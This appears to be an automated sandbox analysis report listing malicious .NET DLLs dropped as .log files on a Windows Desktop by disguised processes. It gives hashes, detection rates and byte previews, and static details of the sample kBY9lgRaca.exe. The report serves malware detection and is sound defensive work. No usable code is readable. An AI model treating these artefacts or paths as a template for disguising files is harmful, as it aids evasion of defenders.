Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hiNMadse.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iesEpfvs.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iqbcNzlc.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\jBpuMXxn.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jJYMqGYt.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jWRUMqoc.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lYDDhZsX.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\owqLTDnh.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pPutoWtQ.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rAZKvkEJ.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	5.570953308352568
Encrypted:	false
SSDEEP:	384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:	A4F19ADB89F8D88DBDF103878CF31608
SHA1:	46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:	D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:	23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tFkkvTtJ.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uqHSBmkN.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vZJioLKA.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vdXshwoU.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\wjWAnjWL.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ykSQugis.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zLeRKKNH.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\zPzZvHLt.log

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\zlIjJSaG.log

Download File

Process:	C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.614559420844397
Encrypted:	false
SSDEEP:	12:PhGI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:pVdUOAokItULVDv
MD5:	1FD9C0E96FA0A2F8D565FE4FB213EB86
SHA1:	7DC87BCD84B5C867509BCC7634A7B5EAF4D1B9F7
SHA-256:	8F90D047643E2E46B67FF76F440B5C3CE391A3204025821D0B76F38BF42C90C8
SHA-512:	7FF19719E6C0F7F8D7CCC277195C039AFE6C1D83D952451CD0FEDCE200CD8538B6B166BE75B633A6842D9111CF8670283BCBFD55F4BB4BCB5D248935494DD742
Malicious:	false
Preview:	..Pinging 138727 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.970910105184574
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	kBY9lgRaca.exe
File size:	3'589'074 bytes
MD5:	3bfa5607ba2fdb912bf3c1b06950be30
SHA1:	09f81b7d75c7c337e8e25303e70f942f52a346c3
SHA256:	abb75d8cf0b557c95d295ebedcc3861cd966bb6bc53deba1d66ed6c3ec7abcde
SHA512:	bd26ccd01ad728fabd51d88359afbb6f60d3a80085c75e6dc4071db006dbe0e2b44a8c55e0f85037b6d7b7646912a40f12ca59d939ce3b8421ea179d1f945940
SSDEEP:	49152:IBJNXBzeEo1tFlwksnSGat746RzF50obO+bbxI2OXI33kM5dlWnBL3rLTfwILm:ynXBaEuDBaat7rJX0KVbxIVXvMLInx0D
TLSH:	99F5235278C485B3D9231D734DA82721743DBE201B6ACEEB63816E9ECA316D0E731B75
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
